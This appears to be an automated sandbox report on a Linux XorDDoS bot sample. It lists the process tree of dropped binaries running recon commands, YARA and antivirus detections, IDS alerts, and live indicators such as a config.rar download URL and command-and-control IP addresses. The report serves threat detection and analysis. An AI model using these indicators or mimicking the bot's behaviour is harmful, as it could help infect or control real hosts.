        • vdaqfdcrtx (PID: 5928, Parent: 3310, MD5: 463633af9af1cdf80b749f3e011adfa1) Arguments: /usr/bin/vdaqfdcrtx "cd /etc" 4554
      • 4ljhdTTyiA New Fork (PID: 5929, Parent: 4554)
        • vdaqfdcrtx (PID: 5931, Parent: 3310, MD5: 463633af9af1cdf80b749f3e011adfa1) Arguments: /usr/bin/vdaqfdcrtx id 4554
      • 4ljhdTTyiA New Fork (PID: 5932, Parent: 4554)
        • vdaqfdcrtx (PID: 5935, Parent: 3310, MD5: 463633af9af1cdf80b749f3e011adfa1) Arguments: /usr/bin/vdaqfdcrtx top 4554
      • 4ljhdTTyiA New Fork (PID: 5936, Parent: 4554)
        • vdaqfdcrtx (PID: 5940, Parent: 3310, MD5: 463633af9af1cdf80b749f3e011adfa1) Arguments: /usr/bin/vdaqfdcrtx whoami 4554
      • 4ljhdTTyiA New Fork (PID: 5943, Parent: 4554)
        • vdaqfdcrtx (PID: 5947, Parent: 3310, MD5: 463633af9af1cdf80b749f3e011adfa1) Arguments: /usr/bin/vdaqfdcrtx sh 4554
      • 4ljhdTTyiA New Fork (PID: 5982, Parent: 4554)
        • vyvijtmtnz (PID: 5983, Parent: 5982, MD5: b83b68030fb7999845ce985c2ff676ae) Arguments: /usr/bin/vyvijtmtnz "ifconfig eth0" 4554
      • 4ljhdTTyiA New Fork (PID: 5984, Parent: 4554)
        • vyvijtmtnz (PID: 5986, Parent: 3310, MD5: b83b68030fb7999845ce985c2ff676ae) Arguments: /usr/bin/vyvijtmtnz bash 4554
      • 4ljhdTTyiA New Fork (PID: 5987, Parent: 4554)
        • vyvijtmtnz (PID: 5990, Parent: 3310, MD5: b83b68030fb7999845ce985c2ff676ae) Arguments: /usr/bin/vyvijtmtnz "netstat -antop" 4554
      • 4ljhdTTyiA New Fork (PID: 5991, Parent: 4554)
        • vyvijtmtnz (PID: 5995, Parent: 3310, MD5: b83b68030fb7999845ce985c2ff676ae) Arguments: /usr/bin/vyvijtmtnz "ifconfig eth0" 4554
      • 4ljhdTTyiA New Fork (PID: 5999, Parent: 4554)
        • vyvijtmtnz (PID: 6003, Parent: 3310, MD5: b83b68030fb7999845ce985c2ff676ae) Arguments: /usr/bin/vyvijtmtnz "ifconfig eth0" 4554
      • 4ljhdTTyiA New Fork (PID: 6037, Parent: 4554)
        • vggdimllrz (PID: 6038, Parent: 3310, MD5: c6b06d43564b070c6bd2759e06e402a2) Arguments: /usr/bin/vggdimllrz who 4554
      • 4ljhdTTyiA New Fork (PID: 6039, Parent: 4554)
        • vggdimllrz (PID: 6041, Parent: 3310, MD5: c6b06d43564b070c6bd2759e06e402a2) Arguments: /usr/bin/vggdimllrz "sleep 1" 4554
      • 4ljhdTTyiA New Fork (PID: 6042, Parent: 4554)
        • vggdimllrz (PID: 6046, Parent: 3310, MD5: c6b06d43564b070c6bd2759e06e402a2) Arguments: /usr/bin/vggdimllrz sh 4554
      • 4ljhdTTyiA New Fork (PID: 6048, Parent: 4554)
        • vggdimllrz (PID: 6052, Parent: 3310, MD5: c6b06d43564b070c6bd2759e06e402a2) Arguments: /usr/bin/vggdimllrz bash 4554
      • 4ljhdTTyiA New Fork (PID: 6054, Parent: 4554)
        • vggdimllrz (PID: 6059, Parent: 3310, MD5: c6b06d43564b070c6bd2759e06e402a2) Arguments: /usr/bin/vggdimllrz "grep \"A\"" 4554
      • 4ljhdTTyiA New Fork (PID: 6092, Parent: 4554)
        • dowmukqhnk (PID: 6093, Parent: 3310, MD5: 0d8777ed6e9f2a06a4b26f364e044244) Arguments: /usr/bin/dowmukqhnk ifconfig 4554
      • 4ljhdTTyiA New Fork (PID: 6094, Parent: 4554)
        • dowmukqhnk (PID: 6096, Parent: 3310, MD5: 0d8777ed6e9f2a06a4b26f364e044244) Arguments: /usr/bin/dowmukqhnk ls 4554
      • 4ljhdTTyiA New Fork (PID: 6097, Parent: 4554)
        • dowmukqhnk (PID: 6100, Parent: 3310, MD5: 0d8777ed6e9f2a06a4b26f364e044244) Arguments: /usr/bin/dowmukqhnk "ps -ef" 4554
      • 4ljhdTTyiA New Fork (PID: 6102, Parent: 4554)
        • dowmukqhnk (PID: 6106, Parent: 3310, MD5: 0d8777ed6e9f2a06a4b26f364e044244) Arguments: /usr/bin/dowmukqhnk "sleep 1" 4554
      • 4ljhdTTyiA New Fork (PID: 6109, Parent: 4554)
        • dowmukqhnk (PID: 6113, Parent: 3310, MD5: 0d8777ed6e9f2a06a4b26f364e044244) Arguments: /usr/bin/dowmukqhnk ls 4554
      • 4ljhdTTyiA New Fork (PID: 6147, Parent: 4554)
        • ejrpibbjio (PID: 6148, Parent: 3310, MD5: 912d89d5f0a301b51e44cb5abee3dfdf) Arguments: /usr/bin/ejrpibbjio "echo \"find\"" 4554
      • 4ljhdTTyiA New Fork (PID: 6149, Parent: 4554)
        • ejrpibbjio (PID: 6151, Parent: 3310, MD5: 912d89d5f0a301b51e44cb5abee3dfdf) Arguments: /usr/bin/ejrpibbjio "cd /etc" 4554
      • 4ljhdTTyiA New Fork (PID: 6152, Parent: 4554)
        • ejrpibbjio (PID: 6154, Parent: 3310, MD5: 912d89d5f0a301b51e44cb5abee3dfdf) Arguments: /usr/bin/ejrpibbjio "grep \"A\"" 4554
      • 4ljhdTTyiA New Fork (PID: 6155, Parent: 4554)
        • ejrpibbjio (PID: 6159, Parent: 3310, MD5: 912d89d5f0a301b51e44cb5abee3dfdf) Arguments: /usr/bin/ejrpibbjio "ls -la" 4554
      • 4ljhdTTyiA New Fork (PID: 6161, Parent: 4554)
        • ejrpibbjio (PID: 6166, Parent: 3310, MD5: 912d89d5f0a301b51e44cb5abee3dfdf) Arguments: /usr/bin/ejrpibbjio "sleep 1" 4554
      • 4ljhdTTyiA New Fork (PID: 6212, Parent: 4554)
        • ztfvwcbmzm (PID: 6213, Parent: 3310, MD5: e1397eee698786136742d875d10177ca) Arguments: /usr/bin/ztfvwcbmzm "echo \"find\"" 4554
      • 4ljhdTTyiA New Fork (PID: 6214, Parent: 4554)
        • ztfvwcbmzm (PID: 6215, Parent: 3310, MD5: e1397eee698786136742d875d10177ca) Arguments: /usr/bin/ztfvwcbmzm whoami 4554
      • 4ljhdTTyiA New Fork (PID: 6216, Parent: 4554)
        • ztfvwcbmzm (PID: 6217, Parent: 3310, MD5: e1397eee698786136742d875d10177ca) Arguments: /usr/bin/ztfvwcbmzm gnome-terminal 4554
      • 4ljhdTTyiA New Fork (PID: 6218, Parent: 4554)
        • ztfvwcbmzm (PID: 6219, Parent: 3310, MD5: e1397eee698786136742d875d10177ca) Arguments: /usr/bin/ztfvwcbmzm sh 4554
      • 4ljhdTTyiA New Fork (PID: 6220, Parent: 4554)
        • ztfvwcbmzm (PID: 6224, Parent: 3310, MD5: e1397eee698786136742d875d10177ca) Arguments: /usr/bin/ztfvwcbmzm sh 4554
      • 4ljhdTTyiA New Fork (PID: 6267, Parent: 4554)
        • getzgxvgyl (PID: 6268, Parent: 3310, MD5: bc5ec5fe87f5d79b8c779995fd03ec4a) Arguments: /usr/bin/getzgxvgyl "cat resolv.conf" 4554
      • 4ljhdTTyiA New Fork (PID: 6269, Parent: 4554)
        • getzgxvgyl (PID: 6270, Parent: 3310, MD5: bc5ec5fe87f5d79b8c779995fd03ec4a) Arguments: /usr/bin/getzgxvgyl "echo \"find\"" 4554
      • 4ljhdTTyiA New Fork (PID: 6271, Parent: 4554)
        • getzgxvgyl (PID: 6273, Parent: 3310, MD5: bc5ec5fe87f5d79b8c779995fd03ec4a) Arguments: /usr/bin/getzgxvgyl "ls -la" 4554
      • 4ljhdTTyiA New Fork (PID: 6274, Parent: 4554)
        • getzgxvgyl (PID: 6277, Parent: 3310, MD5: bc5ec5fe87f5d79b8c779995fd03ec4a) Arguments: /usr/bin/getzgxvgyl gnome-terminal 4554
      • 4ljhdTTyiA New Fork (PID: 6278, Parent: 4554)
        • getzgxvgyl (PID: 6282, Parent: 3310, MD5: bc5ec5fe87f5d79b8c779995fd03ec4a) Arguments: /usr/bin/getzgxvgyl "netstat -antop" 4554
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
4ljhdTTyiAJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
    4ljhdTTyiAXOR_DDosv1Rule to detect XOR DDos infectionAkamai CSIRT
    • 0x6b0d4:$st0: BB2FA36AAA9541F0
    • 0x6b0e4:$st0: BB2FA36AAA9541F0
    • 0x6b0f4:$st0: BB2FA36AAA9541F0
    • 0x6b104:$st0: BB2FA36AAA9541F0
    • 0x6b114:$st0: BB2FA36AAA9541F0
    • 0x6b124:$st0: BB2FA36AAA9541F0
    • 0x6b134:$st0: BB2FA36AAA9541F0
    • 0x6b144:$st0: BB2FA36AAA9541F0
    • 0x6b154:$st0: BB2FA36AAA9541F0
    • 0x6b164:$st0: BB2FA36AAA9541F0
    • 0x6b174:$st0: BB2FA36AAA9541F0
    • 0x6b184:$st0: BB2FA36AAA9541F0
    • 0x6b194:$st0: BB2FA36AAA9541F0
    • 0x6b1a4:$st0: BB2FA36AAA9541F0
    • 0x6b1b4:$st0: BB2FA36AAA9541F0
    • 0x6b1c4:$st0: BB2FA36AAA9541F0
    • 0x6b1d4:$st0: BB2FA36AAA9541F0
    • 0x6b1e4:$st0: BB2FA36AAA9541F0
    • 0x6b1f4:$st0: BB2FA36AAA9541F0
    • 0x6b204:$st0: BB2FA36AAA9541F0
    • 0x6b214:$st0: BB2FA36AAA9541F0

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    /usr/bin/nyavevzqtwJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
      /usr/bin/uoewtvxqddJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
        /usr/bin/uoewtvxqddXOR_DDosv1Rule to detect XOR DDos infectionAkamai CSIRT
        • 0x6b0d4:$st0: BB2FA36AAA9541F0
        • 0x6b0e4:$st0: BB2FA36AAA9541F0
        • 0x6b0f4:$st0: BB2FA36AAA9541F0
        • 0x6b104:$st0: BB2FA36AAA9541F0
        • 0x6b114:$st0: BB2FA36AAA9541F0
        • 0x6b124:$st0: BB2FA36AAA9541F0
        • 0x6b134:$st0: BB2FA36AAA9541F0
        • 0x6b144:$st0: BB2FA36AAA9541F0
        • 0x6b154:$st0: BB2FA36AAA9541F0
        • 0x6b164:$st0: BB2FA36AAA9541F0
        • 0x6b174:$st0: BB2FA36AAA9541F0
        • 0x6b184:$st0: BB2FA36AAA9541F0
        • 0x6b194:$st0: BB2FA36AAA9541F0
        • 0x6b1a4:$st0: BB2FA36AAA9541F0
        • 0x6b1b4:$st0: BB2FA36AAA9541F0
        • 0x6b1c4:$st0: BB2FA36AAA9541F0
        • 0x6b1d4:$st0: BB2FA36AAA9541F0
        • 0x6b1e4:$st0: BB2FA36AAA9541F0
        • 0x6b1f4:$st0: BB2FA36AAA9541F0
        • 0x6b204:$st0: BB2FA36AAA9541F0
        • 0x6b214:$st0: BB2FA36AAA9541F0
        /usr/bin/dxeguomyxcJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
          /usr/bin/dxeguomyxcXOR_DDosv1Rule to detect XOR DDos infectionAkamai CSIRT
          • 0x6b0d4:$st0: BB2FA36AAA9541F0
          • 0x6b0e4:$st0: BB2FA36AAA9541F0
          • 0x6b0f4:$st0: BB2FA36AAA9541F0
          • 0x6b104:$st0: BB2FA36AAA9541F0
          • 0x6b114:$st0: BB2FA36AAA9541F0
          • 0x6b124:$st0: BB2FA36AAA9541F0
          • 0x6b134:$st0: BB2FA36AAA9541F0
          • 0x6b144:$st0: BB2FA36AAA9541F0
          • 0x6b154:$st0: BB2FA36AAA9541F0
          • 0x6b164:$st0: BB2FA36AAA9541F0
          • 0x6b174:$st0: BB2FA36AAA9541F0
          • 0x6b184:$st0: BB2FA36AAA9541F0
          • 0x6b194:$st0: BB2FA36AAA9541F0
          • 0x6b1a4:$st0: BB2FA36AAA9541F0
          • 0x6b1b4:$st0: BB2FA36AAA9541F0
          • 0x6b1c4:$st0: BB2FA36AAA9541F0
          • 0x6b1d4:$st0: BB2FA36AAA9541F0
          • 0x6b1e4:$st0: BB2FA36AAA9541F0
          • 0x6b1f4:$st0: BB2FA36AAA9541F0
          • 0x6b204:$st0: BB2FA36AAA9541F0
          • 0x6b214:$st0: BB2FA36AAA9541F0
          Click to see the 20 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          5232.1.0000000008048000.00000000080cf000.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
            4812.1.0000000008048000.00000000080cf000.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
              5320.1.0000000008048000.00000000080cf000.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
                4666.1.0000000008048000.00000000080cf000.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
                  5100.1.0000000008048000.00000000080cf000.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
                    Click to see the 83 entries

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Antivirus / Scanner detection for submitted sampleShow sources
                    Source: 4ljhdTTyiAAvira: detected
                    Antivirus detection for dropped fileShow sources
                    Source: /usr/bin/gqczobuaccAvira: detection malicious, Label: LINUX/Xorddos.cona
                    Source: /usr/bin/jjltawydwfAvira: detection malicious, Label: LINUX/Xorddos.cona
                    Source: /usr/bin/rlyjyybyumAvira: detection malicious, Label: LINUX/Xorddos.cona
                    Source: /usr/bin/ouhdchrbdzAvira: detection malicious, Label: LINUX/Xorddos.cona
                    Source: /usr/bin/tjdqviitkhAvira: detection malicious, Label: LINUX/Xorddos.cona
                    Source: /usr/bin/nyavevzqtwAvira: detection malicious, Label: LINUX/Xorddos.cona
                    Source: /lib/libudev.soAvira: detection malicious, Label: LINUX/Xorddos.cona
                    Source: /usr/bin/ctrygxclrxAvira: detection malicious, Label: LINUX/Xorddos.cona
                    Source: /usr/bin/aspbnnkmsoAvira: detection malicious, Label: LINUX/Xorddos.cona
                    Source: /usr/bin/fcxqfstrdmAvira: detection malicious, Label: LINUX/Xorddos.cona
                    Source: /usr/bin/uoewtvxqddAvira: detection malicious, Label: LINUX/Xorddos.cona
                    Source: /usr/bin/dxeguomyxcAvira: detection malicious, Label: LINUX/Xorddos.cona
                    Source: /usr/bin/lgnmbyzzlqAvira: detection malicious, Label: LINUX/Xorddos.cona
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: 4ljhdTTyiAVirustotal: Detection: 66%Perma Link
                    Source: 4ljhdTTyiAMetadefender: Detection: 62%Perma Link
                    Source: 4ljhdTTyiAReversingLabs: Detection: 72%
                    Machine Learning detection for dropped fileShow sources
                    Source: /usr/bin/gqczobuaccJoe Sandbox ML: detected
                    Source: /usr/bin/jjltawydwfJoe Sandbox ML: detected
                    Source: /usr/bin/rlyjyybyumJoe Sandbox ML: detected
                    Source: /usr/bin/ouhdchrbdzJoe Sandbox ML: detected
                    Source: /usr/bin/tjdqviitkhJoe Sandbox ML: detected
                    Source: /usr/bin/nyavevzqtwJoe Sandbox ML: detected
                    Source: /lib/libudev.soJoe Sandbox ML: detected
                    Source: /usr/bin/ctrygxclrxJoe Sandbox ML: detected
                    Source: /usr/bin/aspbnnkmsoJoe Sandbox ML: detected
                    Source: /usr/bin/fcxqfstrdmJoe Sandbox ML: detected
                    Source: /usr/bin/uoewtvxqddJoe Sandbox ML: detected
                    Source: /usr/bin/dxeguomyxcJoe Sandbox ML: detected
                    Source: /usr/bin/lgnmbyzzlqJoe Sandbox ML: detected
                    Machine Learning detection for sampleShow sources
                    Source: 4ljhdTTyiAJoe Sandbox ML: detected
                    Source: /tmp/4ljhdTTyiA (PID: 4554)Reads CPU info from proc file: /proc/cpuinfoJump to behavior

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2021022 ET TROJAN Wapack Labs Sinkhole DNS Reply 8.8.8.8:53 -> 192.168.2.20:44091
                    Source: TrafficSnort IDS: 2021336 ET TROJAN DDoS.XOR Checkin via HTTP 192.168.2.20:50586 -> 23.253.46.64:80
                    Source: TrafficSnort IDS: 2020381 ET TROJAN DDoS.XOR Checkin 192.168.2.20:39688 -> 204.11.56.48:53
                    Source: TrafficSnort IDS: 2020381 ET TROJAN DDoS.XOR Checkin 192.168.2.20:40742 -> 104.161.25.33:53
                    Detected non-DNS traffic on DNS portShow sources
                    Source: global trafficTCP traffic: 192.168.2.20:39688 -> 204.11.56.48:53
                    Source: global trafficTCP traffic: 192.168.2.20:40742 -> 104.161.25.33:53
                    Source: global trafficHTTP traffic detected: GET /config.rar HTTP/1.1Accept: */*Accept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)Host: aaa.dsaj2a.orgConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: aaa.dsaj2a.org
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 19 Jul 2021 22:23:38 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
                    Source: 4ljhdTTyiA, 4551.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmpString found in binary or memory: http://aaa.dsaj2a.org/config.rar
                    Source: 4ljhdTTyiA, 4551.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 4555.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 4655.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 4713.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 4768.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 4823.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 4878.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 4933.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 4988.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 5043.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 5100.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 5155.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 5210.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 5265.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 5320.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 5375.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 5430.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 5485.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmp, 4ljhdTTyiA, 5540.1.00000000ff9cc000.00000000ff9ed000.rw-.sdmpString found in binary or memory: http://aaa.dsaj2a.org/config.rar7.com:53
                    Source: 4ljhdTTyiA, 4551.1.0000000008048000.00000000080cf000.r-x.sdmpString found in binary or memory: http://www.gnu.org/software/libc/bugs.html

                    DDoS:

                    barindex
                    Yara detected XorDDoS BotShow sources
                    Source: Yara matchFile source: 4ljhdTTyiA, type: SAMPLE
                    Source: Yara matchFile source: 5232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4812.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4666.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5100.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4856.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4867.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5144.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4768.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5166.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4845.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4757.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5188.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5032.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4933.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4889.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4790.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4724.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4834.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5518.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4944.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4556.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4878.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4922.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5287.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5276.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5122.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4735.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4900.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4677.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5076.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4977.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5043.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5254.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4911.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4699.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4555.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5386.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4746.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4988.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5087.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5021.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4578.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4713.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
